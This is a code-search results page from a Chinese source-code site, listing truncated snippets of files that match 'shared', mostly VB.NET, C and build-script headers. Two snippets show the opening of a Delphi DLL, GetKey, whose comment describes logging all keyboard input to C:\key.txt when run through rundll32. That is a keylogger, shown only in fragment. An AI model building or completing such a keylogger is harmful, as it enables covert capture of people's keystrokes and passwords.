代码搜索:shared
找到约 10,000 项符合「shared」的源代码
代码结果 10,000
www.eeworm.com/read/407292/11422569
vb dataprovider.vb
Imports System
Imports DotNetNuke
Namespace BigBridge.Modules.JobPost
''' -----------------------------------------------------------------------------
'''
''' An abstra
www.eeworm.com/read/405814/11456444
vb common.vb
Imports System.Collections.Generic
Public Class Common
Private Shared _ErrCode As System.Collections.Generic.Dictionary(Of Integer, String) = Nothing
Public Shared StrConn As String =
www.eeworm.com/read/404527/11484416
def hook.def
LIBRARY Hook
EXPORTS
SetHook @2
SEGMENTS
MySec READ WRITE SHARED
www.eeworm.com/read/401851/11546987
vb personnel.vb
'人事类
Public Class Personnel
Public Shared Function Hire(ByVal sEmployeeNumber As String) As Employee
Return Nothing
End Function
Public Shared Function Fire(ByVal sEmployeeNumber
www.eeworm.com/read/261600/11634891
vb global.vb
Imports System
Imports System.Data
Imports System.Data.SqlClient
Public Class sqlClass
'Global静态类存放所有的应用程序全局变量,全局配置信息等.
Public Sub New()
End Sub
'登陆数据库用
Private Shared
www.eeworm.com/read/347223/11681577
c mutexsemdemo.c
/* mutexSemDemo.c - Demonstrate the usage of the mutual exclusion semaphore
* for intertask synchronization and obtaining exclusive
* access to a data structur
www.eeworm.com/read/346065/11771511
vb settings.designer.vb
'------------------------------------------------------------------------------
'
' This code was generated by a tool.
' Runtime Version:2.0.50727.832
'
' Changes to
www.eeworm.com/read/345799/11791527
dpr getkey.dpr
{本程序能过滤wm_char,和wm_ime_char消息,所以能得到键盘输入的任何字中英文字符,结果存在C;\key.txt中,使用方法为:
rundll32 GetKey.dll,run
}
library GetKey;
uses windows,messages,sysutils;
{$r *.res}
const
HookMemFileName='Hoo
www.eeworm.com/read/345799/11791534
~dpr getkey.~dpr
{本程序能过滤wm_char,和wm_ime_char消息,所以能得到键盘输入的任何字中英文字符,结果存在C;\key.txt中,使用方法为:
rundll32 GetKey.dll,run
}
library GetKey;
uses windows,messages,sysutils;
{$r *.res}
const
HookMemFileName='Hoo
www.eeworm.com/read/154491/11950516
configure
#!/bin/sh
# configure script for zlib. This script is needed only if
# you wish to build a shared library and your system supports them,
# of if you need special compiler, flags or install director